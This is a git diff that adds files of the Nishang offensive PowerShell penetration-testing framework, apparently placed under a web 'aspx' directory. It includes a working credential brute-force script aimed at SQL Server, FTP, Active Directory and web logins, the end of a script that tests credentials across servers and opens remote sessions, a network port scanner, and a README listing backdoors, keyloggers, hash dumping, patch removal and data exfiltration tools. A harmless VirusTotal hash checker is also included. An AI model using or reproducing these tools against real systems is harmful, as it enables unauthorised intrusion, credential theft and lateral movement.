||||||
|
}
|
||||||
|
|
||||||
|
foreach ($server in $servers)
|
||||||
|
{
|
||||||
|
$check = Invoke-Expression $CheckCommand
|
||||||
|
if($check -ne $null)
|
||||||
|
{
|
||||||
|
Write-Host "Credentials worked on $server !!" -ForegroundColor Green
|
||||||
|
if ($CreateSessions -eq $True)
|
||||||
|
{
|
||||||
|
"`nCreating Session for $server"
|
||||||
|
Invoke-Expression $SessionCommand
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
"Could not connect or credentials didn't work on $server"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($CreateSessions -eq $True)
|
||||||
|
{
|
||||||
|
Write-Host "`nFollowing Sessions have been created: " -ForegroundColor Green
|
||||||
|
Get-PSSession
|
||||||
|
}
|
||||||
|
}
|
77
aspx/nishang/Pivot/Run-EXEonRemote.ps1
Normal file
77
aspx/nishang/Pivot/Run-EXEonRemote.ps1
Normal file
File diff suppressed because one or more lines are too long
122
aspx/nishang/Prasadhak/Prasadhak.ps1
Normal file
122
aspx/nishang/Prasadhak/Prasadhak.ps1
Normal file
|
@ -0,0 +1,122 @@
|
||||||
|
#Requires -Version 3
|
||||||
|
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang script which checks running processes for malwares.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This script uses takes md5 hashes of running processes (the correspondibg executable)
|
||||||
|
on the target system and search the hashes in the Virustotal database using the Public API.
|
||||||
|
|
||||||
|
.PARAMETER APIKEY
|
||||||
|
THe APIKEY provided when someone registers to virustotal
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Prasadhak 1fe0ef5feca2f84eb450bc3617f839e317b2a686af4d651a9bada77a522201b0
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://www.labofapenetrationtester.com/2013/01/introducing-prasadhak.html
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
|
||||||
|
.Notes
|
||||||
|
The word Prasadhak means purifier in Sanskrit language.
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Prasadhak
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$apikey
|
||||||
|
)
|
||||||
|
|
||||||
|
function post_http($url,$parameters)
|
||||||
|
{
|
||||||
|
$http_request = New-Object -ComObject Msxml2.XMLHTTP
|
||||||
|
$http_request.open("POST", $url, $false)
|
||||||
|
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
|
||||||
|
$http_request.setRequestHeader("Content-length", $parameters.length);
|
||||||
|
$http_request.setRequestHeader("Connection", "close")
|
||||||
|
$http_request.send($parameters)
|
||||||
|
$script:response = $http_request.responseText
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function check
|
||||||
|
{
|
||||||
|
|
||||||
|
$res = $response | ConvertFrom-JSON
|
||||||
|
foreach ($code in $res)
|
||||||
|
{
|
||||||
|
#$proc1[$track]
|
||||||
|
if ($code.response_code -eq 0)
|
||||||
|
{
|
||||||
|
Write-Host "Not found in VT database. " #+ $proc1[$track]
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif (($code.response_code -eq 1) -and ($code.positives -ne 0))
|
||||||
|
{
|
||||||
|
Write-Host "Something malicious is found. " -ForegroundColor Red # $proc1[$track]
|
||||||
|
$code.Permalink
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif (($code.response_code -eq 1))
|
||||||
|
{
|
||||||
|
Write-Host "This is reported clean. " -ForegroundColor Green # $proc1[$track]
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif ($res.response_code -eq -2)
|
||||||
|
{
|
||||||
|
"File queued for analysis. " #+ $proc1[$track]
|
||||||
|
$code.Permalink
|
||||||
|
}
|
||||||
|
#$track++
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
$ErrorActionPreference = "SilentlyContinue"
|
||||||
|
$iteration = 0
|
||||||
|
$count = 0
|
||||||
|
$reqcount = 0
|
||||||
|
[String[]]$hash = @()
|
||||||
|
#[String[]]$procname = @()
|
||||||
|
"Reading Processes and determining executables."
|
||||||
|
Start-Sleep -Seconds 3
|
||||||
|
$procs = (Get-Process).path
|
||||||
|
$procnumber = Get-Process | Measure-Object -line
|
||||||
|
"Total Processes detected: " + $procnumber.lines
|
||||||
|
"Total Processes for which executables were detected: " + $procs.length
|
||||||
|
Start-Sleep -Seconds 3
|
||||||
|
|
||||||
|
|
||||||
|
foreach ($proc in $procs)
|
||||||
|
{
|
||||||
|
$md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider #http://stackoverflow.com/questions/10521061/how-to-get-a-md5-checksum-in-powershell
|
||||||
|
$hash = $hash + "," + [System.BitConverter]::ToString($md5.ComputeHash([System.IO.File]::ReadAllBytes($proc))).Replace("-", "").ToLower()
|
||||||
|
#$procname = $procname + $proc
|
||||||
|
if ((($count -eq 25) -and (($procs.length - 25) -ge 0)) -or ($procs.Length -lt 25) -or (($iteration -ge 1) -and ((($procs.length - (25 * $iteration)) - 1) -eq $count)))
|
||||||
|
{
|
||||||
|
Post_http "https://www.virustotal.com/vtapi/v2/file/report" "resource=$hash&apikey=$apikey"
|
||||||
|
check
|
||||||
|
$hash = 0
|
||||||
|
$count = 0
|
||||||
|
$reqcount++
|
||||||
|
$iteration++
|
||||||
|
}
|
||||||
|
if ($reqcount -eq 4)
|
||||||
|
{
|
||||||
|
"Waiting for one minute as VT allows only 4 requests per minute."
|
||||||
|
Start-Sleep -seconds 60
|
||||||
|
$reqcount = 0
|
||||||
|
}
|
||||||
|
|
||||||
|
$count++
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
201
aspx/nishang/README.md
Normal file
201
aspx/nishang/README.md
Normal file
|
@ -0,0 +1,201 @@
|
||||||
|
#Nishang
|
||||||
|
|
||||||
|
###Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security usage and during Penetraion Tests. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.
|
||||||
|
|
||||||
|
####Scripts
|
||||||
|
Nishang currently contains following scripts and payloads.
|
||||||
|
|
||||||
|
#####Antak - the Webshell
|
||||||
|
[Antak](https://github.com/samratashok/nishang/tree/master/Antak-WebShell)
|
||||||
|
|
||||||
|
Execute powershell scripts in-memory, commands, download and upload files using this webshell.
|
||||||
|
|
||||||
|
#####Backdoors
|
||||||
|
[HTTP-Backdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/HTTP-Backdoor.ps1)
|
||||||
|
|
||||||
|
A backdoor which is capable to recieve instructions from third party websites and could execute powershell scripts in memory.
|
||||||
|
|
||||||
|
[DNS_TXT_Pwnage](https://github.com/samratashok/nishang/blob/master/Backdoors/DNS_TXT_Pwnage.ps1)
|
||||||
|
|
||||||
|
A Backdoor which could recieve commands and powershell scripts from DNS TXT queries and execute those on target and could be controlled remotely using the queries.
|
||||||
|
|
||||||
|
[Execute-OnTime](https://github.com/samratashok/nishang/blob/master/Backdoors/Execute-OnTime.ps1)
|
||||||
|
|
||||||
|
A Backdoor which could execute powershell scripts on a given time on a target.
|
||||||
|
|
||||||
|
#####Escalation
|
||||||
|
[Enable-DuplicateToken](https://github.com/samratashok/nishang/blob/master/Escalation/Enable-DuplicateToken.ps1)
|
||||||
|
|
||||||
|
When SYSTEM privileges are required.
|
||||||
|
|
||||||
|
[Remove-Update](https://github.com/samratashok/nishang/blob/master/Escalation/Remove-Update.ps1)
|
||||||
|
|
||||||
|
Introduce vulnerabilites by removing patches.
|
||||||
|
|
||||||
|
#####Execution
|
||||||
|
[Download-Execute-PS](https://github.com/samratashok/nishang/blob/master/Execution/Download-Execute-PS.ps1)
|
||||||
|
|
||||||
|
Download and execute a powershell script in memory.
|
||||||
|
|
||||||
|
[Download_Execute](https://github.com/samratashok/nishang/blob/master/Execution/Download_Execute.ps1)
|
||||||
|
|
||||||
|
Download an executable in text format, convert to executable and execute.
|
||||||
|
|
||||||
|
[Execute-Command-MSSQL](https://github.com/samratashok/nishang/blob/master/Execution/Execute-Command-MSSQL.ps1)
|
||||||
|
|
||||||
|
Run powershell commands, native commands or SQL commands on a MSSQL Server with sufficient privileges.
|
||||||
|
|
||||||
|
[Execute-DNSTXT-Code](https://github.com/samratashok/nishang/blob/master/Execution/Execute-DNSTXT-Code.ps1)
|
||||||
|
|
||||||
|
Execute shellcode in memeory using DNS TXT queries.
|
||||||
|
|
||||||
|
#####Gather
|
||||||
|
[Check-VM](https://github.com/samratashok/nishang/blob/master/Gather/Check-VM.ps1)
|
||||||
|
|
||||||
|
Check for Virtual Machine
|
||||||
|
|
||||||
|
[Copy-VSS](https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1)
|
||||||
|
|
||||||
|
Copy the SAM file using Volume Shadow Service.
|
||||||
|
|
||||||
|
[Credentials](https://github.com/samratashok/nishang/blob/master/Gather/Credentials.ps1)
|
||||||
|
|
||||||
|
Fool a user to give credentials in plain text.
|
||||||
|
|
||||||
|
[FireBuster](https://github.com/samratashok/nishang/blob/master/Gather/FireBuster.ps1)
|
||||||
|
[FireListener](https://github.com/samratashok/nishang/blob/master/Gather/FireListener.ps1)
|
||||||
|
|
||||||
|
A pair of scripts for Egress Testing
|
||||||
|
|
||||||
|
[Get-Information](https://github.com/samratashok/nishang/blob/master/Gather/Get-Information.ps1)
|
||||||
|
|
||||||
|
Get juicy information from a target.
|
||||||
|
|
||||||
|
[Get-LSASecret](https://github.com/samratashok/nishang/blob/master/Gather/Get-LSASecret.ps1)
|
||||||
|
|
||||||
|
Get LSA Secret from a target.
|
||||||
|
|
||||||
|
[Get-PassHashes](https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1)
|
||||||
|
|
||||||
|
Get password hashes from a target.
|
||||||
|
|
||||||
|
[Get-WLAN-Keys](https://github.com/samratashok/nishang/blob/master/Gather/Get-WLAN-Keys.ps1)
|
||||||
|
|
||||||
|
Get WLAN keys in plain from a target.
|
||||||
|
|
||||||
|
[Keylogger](https://github.com/samratashok/nishang/blob/master/Gather/Keylogger.ps1)
|
||||||
|
|
||||||
|
Log keys from a target.
|
||||||
|
|
||||||
|
#####Pivot
|
||||||
|
[Create-MultipleSessions](https://github.com/samratashok/nishang/blob/master/Pivot/Create-MultipleSessions.ps1)
|
||||||
|
|
||||||
|
Check credentials on multiple computers and create PSSessions.
|
||||||
|
|
||||||
|
[Run-EXEonRemote](https://github.com/samratashok/nishang/blob/master/Pivot/Run-EXEonRemote.ps1)
|
||||||
|
Copy and execute an executable on multiple machines.
|
||||||
|
|
||||||
|
#####Prasadhak
|
||||||
|
[Prasadhak](https://github.com/samratashok/nishang/blob/master/Prasadhak/Prasadhak.ps1)
|
||||||
|
|
||||||
|
Check running hashes of running process against Virus Total database.
|
||||||
|
|
||||||
|
#####Scan
|
||||||
|
[Brute-Force](https://github.com/samratashok/nishang/blob/master/Scan/Brute-Force.ps1)
|
||||||
|
|
||||||
|
Brute force FTP, Active Directory, MS SQL Server and Sharepoint.
|
||||||
|
|
||||||
|
[Port-Scan](https://github.com/samratashok/nishang/blob/master/Scan/Port-Scan.ps1)
|
||||||
|
|
||||||
|
A handy port scanner.
|
||||||
|
|
||||||
|
#####Powerpreter
|
||||||
|
[Powerpreter](https://github.com/samratashok/nishang/tree/master/powerpreter)
|
||||||
|
|
||||||
|
All the functionality of nishang in a single script module.
|
||||||
|
|
||||||
|
#####Utility
|
||||||
|
[Add-Exfiltration](https://github.com/samratashok/nishang/blob/master/Utility/Add-Exfiltration.ps1)
|
||||||
|
|
||||||
|
Add data exfiltration capability to gmail,pastebin, webserver and DNS to any script.
|
||||||
|
|
||||||
|
[Add-Persistence](https://github.com/samratashok/nishang/blob/master/Utility/Add-Persistence.ps1)
|
||||||
|
|
||||||
|
Add Reboot persistence capability to a script.
|
||||||
|
|
||||||
|
[Remove-Persistence](https://github.com/samratashok/nishang/blob/master/Utility/Remove-Persistence.ps1)
|
||||||
|
|
||||||
|
Remoce persistence added by the Add-Persistence script.
|
||||||
|
|
||||||
|
[Do-Exfiltration](https://github.com/samratashok/nishang/blob/master/Utility/Do-Exfiltration.ps1)
|
||||||
|
|
||||||
|
Pipe (|) this to any script to exfiltrate the output.
|
||||||
|
|
||||||
|
[Download](https://github.com/samratashok/nishang/blob/master/Utility/Download.ps1)
|
||||||
|
|
||||||
|
Download a file to the target.
|
||||||
|
|
||||||
|
[Parse_Keys](https://github.com/samratashok/nishang/blob/master/Utility/Parse_Keys.ps1)
|
||||||
|
|
||||||
|
Parse keys logged by the Keylogger.
|
||||||
|
|
||||||
|
[Invoke-Encode](https://github.com/samratashok/nishang/blob/master/Utility/Invoke-Decode.ps1)
|
||||||
|
|
||||||
|
Encode and Compress a script or string.
|
||||||
|
|
||||||
|
[Invoke-Decode](https://github.com/samratashok/nishang/blob/master/Utility/Invoke-Decode.ps1)
|
||||||
|
|
||||||
|
Decode and Decompress a script or string from Invoke-Encode.
|
||||||
|
|
||||||
|
[Base64ToString]
|
||||||
|
[StringToBase64]
|
||||||
|
[ExetoText]
|
||||||
|
[TexttoExe]
|
||||||
|
|
||||||
|
####Usage
|
||||||
|
|
||||||
|
Use the individual scripts with dot sourcing
|
||||||
|
|
||||||
|
PS > . .\Get-Information
|
||||||
|
PS > Get-Information
|
||||||
|
|
||||||
|
To get help about any script or payload, use
|
||||||
|
|
||||||
|
PS > Get-Help [scriptname.ps1] -full
|
||||||
|
|
||||||
|
Import all the scripts in current powershell session
|
||||||
|
|
||||||
|
PS > Import-Module .\nishang.psm1
|
||||||
|
|
||||||
|
####Updates
|
||||||
|
|
||||||
|
Updates about Nishang could be found at my blog http://labofapenetrationtester.com/ and my twitter feed @nikhil_mitt
|
||||||
|
|
||||||
|
####Bugs, Feedback and Feature Requests
|
||||||
|
Please raise an issue if you encounter a bug or have a feature request or mail me at nikhil [dot] uitrgpv at gmail.com
|
||||||
|
|
||||||
|
#####Mailing List
|
||||||
|
For feedback, discussions and feature requests join http://groups.google.com/group/nishang-users
|
||||||
|
|
||||||
|
#####Contributing
|
||||||
|
I am always looking for contributors to Nishang. Please submit requests or drop me email.
|
||||||
|
|
||||||
|
#####Blog Posts
|
||||||
|
|
||||||
|
Some blog posts to check out for beginners:
|
||||||
|
|
||||||
|
http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html
|
||||||
|
|
||||||
|
http://labofapenetrationtester.com/2012/08/introducing-nishang-powereshell-for.html
|
||||||
|
|
||||||
|
http://labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html
|
||||||
|
|
||||||
|
http://www.labofapenetrationtester.com/2013/09/powerpreter-and-nishang-Part-2.html
|
||||||
|
|
||||||
|
All posts about Nishang:
|
||||||
|
|
||||||
|
http://www.labofapenetrationtester.com/search/label/Nishang
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
162
aspx/nishang/Scan/Brute-Force.ps1
Normal file
162
aspx/nishang/Scan/Brute-Force.ps1
Normal file
|
@ -0,0 +1,162 @@
|
||||||
|
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Web and FTP.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload tries to login to SQL, ActiveDirectory, Web or FTP using a specific account and password.
|
||||||
|
You can also specify a password-list as input as shown in the Example section.
|
||||||
|
|
||||||
|
.PARAMETER Identity
|
||||||
|
Specifies a SQL Server, FTP Site or Web Site.
|
||||||
|
|
||||||
|
.PARAMETER UserName
|
||||||
|
Specifies a UserName. If blank, trusted connection will be used for SQL and anonymous access will be used for FTP.
|
||||||
|
|
||||||
|
.PARAMETER Password
|
||||||
|
Specifies a Password.
|
||||||
|
|
||||||
|
.PARAMETER Service
|
||||||
|
Enter a Service. Default service is set to SQL.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Brute-Force -Identity SRV01 -UserName sa -Password ""
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Brute-Force -Identity ftp://SRV01 -UserName sa -Password "" -Service FTP
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > "SRV01","SRV02","SRV03" | Brute-Force -UserName sa -Password sa
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Import-CSV .\username.txt | Brute-Force -Identity “targetdomain“ -Password Password1 -Service ActiveDirectory
|
||||||
|
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Brute-Force -Identity "http://www.something.com" -UserName user001 -Password Password1 -Service Web
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://www.truesec.com
|
||||||
|
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/03/use-powershell-to-security-test-sql-server-and-sharepoint.aspx
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
|
||||||
|
.NOTES
|
||||||
|
Goude 2012, TreuSec
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
function Brute-Force {
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Mandatory = $true, Position = 0, ValueFromPipeLineByPropertyName = $true)]
|
||||||
|
[Alias("PSComputerName","CN","MachineName","IP","IPAddress","ComputerName","Url","Ftp","Domain","DistinguishedName")]
|
||||||
|
[string]
|
||||||
|
$Identity,
|
||||||
|
|
||||||
|
[parameter(Position = 1, ValueFromPipeLineByPropertyName = $true)]
|
||||||
|
[string]
|
||||||
|
$UserName,
|
||||||
|
|
||||||
|
[parameter(Position = 2, ValueFromPipeLineByPropertyName = $true)]
|
||||||
|
[string]
|
||||||
|
$Password,
|
||||||
|
|
||||||
|
[parameter(Position = 3)] [ValidateSet("SQL","FTP","ActiveDirectory","Web")]
|
||||||
|
[string]
|
||||||
|
$Service = "SQL"
|
||||||
|
)
|
||||||
|
Process {
|
||||||
|
if($service -eq "SQL") {
|
||||||
|
$Connection = New-Object System.Data.SQLClient.SQLConnection
|
||||||
|
if($userName) {
|
||||||
|
$Connection.ConnectionString = "Data Source=$identity;Initial Catalog=Master;User Id=$userName;Password=$password;"
|
||||||
|
} else {
|
||||||
|
$Connection.ConnectionString = "server=$identity;Initial Catalog=Master;trusted_connection=true;"
|
||||||
|
}
|
||||||
|
Try {
|
||||||
|
$Connection.Open()
|
||||||
|
$success = $true
|
||||||
|
}
|
||||||
|
Catch {
|
||||||
|
$success = $false
|
||||||
|
}
|
||||||
|
if($success -eq $true) {
|
||||||
|
$message = switch($connection.ServerVersion) {
|
||||||
|
{ $_ -match "^6" } { "SQL Server 6.5";Break }
|
||||||
|
{ $_ -match "^6" } { "SQL Server 7";Break }
|
||||||
|
{ $_ -match "^8" } { "SQL Server 2000";Break }
|
||||||
|
{ $_ -match "^9" } { "SQL Server 2005";Break }
|
||||||
|
{ $_ -match "^10\.00" } { "SQL Server 2008";Break }
|
||||||
|
{ $_ -match "^10\.50" } { "SQL Server 2008 R2";Break }
|
||||||
|
Default { "Unknown" }
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
$message = "Unknown"
|
||||||
|
}
|
||||||
|
} elseif($service -eq "FTP") {
|
||||||
|
if($identity -notMatch "^ftp://") {
|
||||||
|
$source = "ftp://" + $identity
|
||||||
|
} else {
|
||||||
|
$source = $identity
|
||||||
|
}
|
||||||
|
try {
|
||||||
|
$ftpRequest = [System.Net.FtpWebRequest]::Create($source)
|
||||||
|
$ftpRequest.Method = [System.Net.WebRequestMethods+Ftp]::ListDirectoryDetails
|
||||||
|
$ftpRequest.Credentials = new-object System.Net.NetworkCredential($userName, $password)
|
||||||
|
$result = $ftpRequest.GetResponse()
|
||||||
|
$message = $result.BannerMessage + $result.WelcomeMessage
|
||||||
|
$success = $true
|
||||||
|
} catch {
|
||||||
|
$message = $error[0].ToString()
|
||||||
|
$success = $false
|
||||||
|
}
|
||||||
|
} elseif($service -eq "ActiveDirectory") {
|
||||||
|
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
|
||||||
|
$contextType = [System.DirectoryServices.AccountManagement.ContextType]::Domain
|
||||||
|
Try {
|
||||||
|
$principalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($contextType, $identity)
|
||||||
|
$success = $true
|
||||||
|
}
|
||||||
|
Catch {
|
||||||
|
$message = "Unable to contact Domain"
|
||||||
|
$success = $false
|
||||||
|
}
|
||||||
|
if($success -ne $false) {
|
||||||
|
Try {
|
||||||
|
$success = $principalContext.ValidateCredentials($username, $password)
|
||||||
|
$message = "Password Match"
|
||||||
|
}
|
||||||
|
Catch {
|
||||||
|
$success = $false
|
||||||
|
$message = "Password doesn't match"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
} elseif($service -eq "Web") {
|
||||||
|
if($identity -notMatch "^(http|https)://") {
|
||||||
|
$source = "http://" + $identity
|
||||||
|
} else {
|
||||||
|
$source = $identity
|
||||||
|
}
|
||||||
|
$webClient = New-Object Net.WebClient
|
||||||
|
$securePassword = ConvertTo-SecureString -AsPlainText -String $password -Force
|
||||||
|
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $userName, $securePassword
|
||||||
|
$webClient.Credentials = $credential
|
||||||
|
Try {
|
||||||
|
$message = $webClient.DownloadString($source)
|
||||||
|
$success = $true
|
||||||
|
}
|
||||||
|
Catch {
|
||||||
|
$success = $false
|
||||||
|
$message = "Password doesn't match"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
# Return Object
|
||||||
|
New-Object PSObject -Property @{
|
||||||
|
ComputerName = $identity;
|
||||||
|
UserName = $username;
|
||||||
|
Password = $Password;
|
||||||
|
Success = $success;
|
||||||
|
Message = $message
|
||||||
|
} | Select-Object Success, Message, UserName, Password, ComputerName
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
131
aspx/nishang/Scan/Port-Scan.ps1
Normal file
131
aspx/nishang/Scan/Port-Scan.ps1
Normal file
|
@ -0,0 +1,131 @@
|
||||||
|
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nihsang payload which Scan IP-Addresses, Ports and HostNames
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
Scan for IP-Addresses, HostNames and open Ports in your Network.
|
||||||
|
|
||||||
|
.PARAMETER StartAddress
|
||||||
|
StartAddress Range
|
||||||
|
|
||||||
|
.PARAMETER EndAddress
|
||||||
|
EndAddress Range
|
||||||
|
|
||||||
|
.PARAMETER ResolveHost
|
||||||
|
Resolve HostName
|
||||||
|
|
||||||
|
.PARAMETER ScanPort
|
||||||
|
Perform a PortScan
|
||||||
|
|
||||||
|
.PARAMETER Ports
|
||||||
|
Ports That should be scanned, default values are: 21,22,23,53,69,71,80,98,110,139,111,
|
||||||
|
389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389,
|
||||||
|
5801,5900,5555,5901
|
||||||
|
|
||||||
|
.PARAMETER TimeOut
|
||||||
|
Time (in MilliSeconds) before TimeOut, Default set to 100
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort -TimeOut 500
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.10.254 -ResolveHost -ScanPort -Port 80
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://www.truesec.com
|
||||||
|
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/02/use-powershell-for-network-host-and-port-discovery-sweeps.aspx
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
|
||||||
|
.NOTES
|
||||||
|
Goude 2012, TrueSec
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Port-Scan {
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[parameter(Mandatory = $true, Position = 0)]
|
||||||
|
[ValidatePattern("\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b")]
|
||||||
|
[string]
|
||||||
|
$StartAddress,
|
||||||
|
|
||||||
|
[parameter(Mandatory = $true, Position = 1)]
|
||||||
|
[ValidatePattern("\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b")]
|
||||||
|
[string]
|
||||||
|
$EndAddress,
|
||||||
|
|
||||||
|
[switch]
|
||||||
|
$ResolveHost,
|
||||||
|
|
||||||
|
[switch]
|
||||||
|
$ScanPort,
|
||||||
|
|
||||||
|
[int[]]
|
||||||
|
$Ports = @(21,22,23,53,69,71,80,98,110,139,111,389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389,5801,5900,5555,5901),
|
||||||
|
|
||||||
|
[int]
|
||||||
|
$TimeOut = 100
|
||||||
|
)
|
||||||
|
Begin {
|
||||||
|
$ping = New-Object System.Net.Networkinformation.Ping
|
||||||
|
}
|
||||||
|
Process {
|
||||||
|
foreach($a in ($StartAddress.Split(".")[0]..$EndAddress.Split(".")[0])) {
|
||||||
|
foreach($b in ($StartAddress.Split(".")[1]..$EndAddress.Split(".")[1])) {
|
||||||
|
foreach($c in ($StartAddress.Split(".")[2]..$EndAddress.Split(".")[2])) {
|
||||||
|
foreach($d in ($StartAddress.Split(".")[3]..$EndAddress.Split(".")[3])) {
|
||||||
|
write-progress -activity PingSweep -status "$a.$b.$c.$d" -percentcomplete (($d/($EndAddress.Split(".")[3])) * 100)
|
||||||
|
$pingStatus = $ping.Send("$a.$b.$c.$d",$TimeOut)
|
||||||
|
if($pingStatus.Status -eq "Success") {
|
||||||
|
if($ResolveHost) {
|
||||||
|
write-progress -activity ResolveHost -status "$a.$b.$c.$d" -percentcomplete (($d/($EndAddress.Split(".")[3])) * 100) -Id 1
|
||||||
|
$getHostEntry = [Net.DNS]::BeginGetHostEntry($pingStatus.Address, $null, $null)
|
||||||
|
}
|
||||||
|
if($ScanPort) {
|
||||||
|
$openPorts = @()
|
||||||
|
for($i = 1; $i -le $ports.Count;$i++) {
|
||||||
|
$port = $Ports[($i-1)]
|
||||||
|
write-progress -activity PortScan -status "$a.$b.$c.$d" -percentcomplete (($i/($Ports.Count)) * 100) -Id 2
|
||||||
|
$client = New-Object System.Net.Sockets.TcpClient
|
||||||
|
$beginConnect = $client.BeginConnect($pingStatus.Address,$port,$null,$null)
|
||||||
|
if($client.Connected) {
|
||||||
|
$openPorts += $port
|
||||||
|
} else {
|
||||||
|
# Wait
|
||||||
|
Start-Sleep -Milli $TimeOut
|
||||||
|
if($client.Connected) {
|
||||||
|
$openPorts += $port
|
||||||
|
}
|
||||||
|
}
|
||||||
|
$client.Close()
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if($ResolveHost) {
|
||||||
|
$hostName = ([Net.DNS]::EndGetHostEntry([IAsyncResult]$getHostEntry)).HostName
|
||||||
|
}
|
||||||
|
# Return Object
|
||||||
|
New-Object PSObject -Property @{
|
||||||
|
IPAddress = "$a.$b.$c.$d";
|
||||||
|
HostName = $hostName;
|
||||||
|
Ports = $openPorts
|
||||||
|
} | Select-Object IPAddress, HostName, Ports
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
End {
|
||||||
|
}
|
||||||
|
}
|
188
aspx/nishang/Utility/Add-Exfiltration.ps1
Normal file
188
aspx/nishang/Utility/Add-Exfiltration.ps1
Normal file
|
@ -0,0 +1,188 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Use this script to exfiltrate data from a target.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This script could be used to exfiltrate data from a target to gmail, pastebin, a webserver which could log POST requests
|
||||||
|
and a DNS Server which could log TXT queries. To decode the data exfiltrated by webserver and DNS methods use Invoke-Decode.ps1
|
||||||
|
in Utility folder of Nishang.
|
||||||
|
|
||||||
|
.PARAMETER Data
|
||||||
|
The data to be exfiltrated. Could be supplied by pipeline.
|
||||||
|
|
||||||
|
.PARAMETER ExfilOption
|
||||||
|
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
|
||||||
|
|
||||||
|
.PARAMETER dev_key
|
||||||
|
The Unique API key provided by pastebin when you register a free account.
|
||||||
|
Unused for other options
|
||||||
|
|
||||||
|
.PARAMETER username
|
||||||
|
Username for the pastebin/gmail account where data would be exfiltrated.
|
||||||
|
Unused for other options
|
||||||
|
|
||||||
|
.PARAMETER password
|
||||||
|
Password for the pastebin/gmail account where data would be exfiltrated.
|
||||||
|
Unused for other options
|
||||||
|
|
||||||
|
.PARAMETER URL
|
||||||
|
The URL of the webserver where POST requests would be sent.
|
||||||
|
|
||||||
|
.PARAMETER DomainName
|
||||||
|
The DomainName, whose subdomains would be used for sending TXT queries to.
|
||||||
|
|
||||||
|
.PARAMETER AuthNS
|
||||||
|
Authoritative Name Server for the domain specified in DomainName
|
||||||
|
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
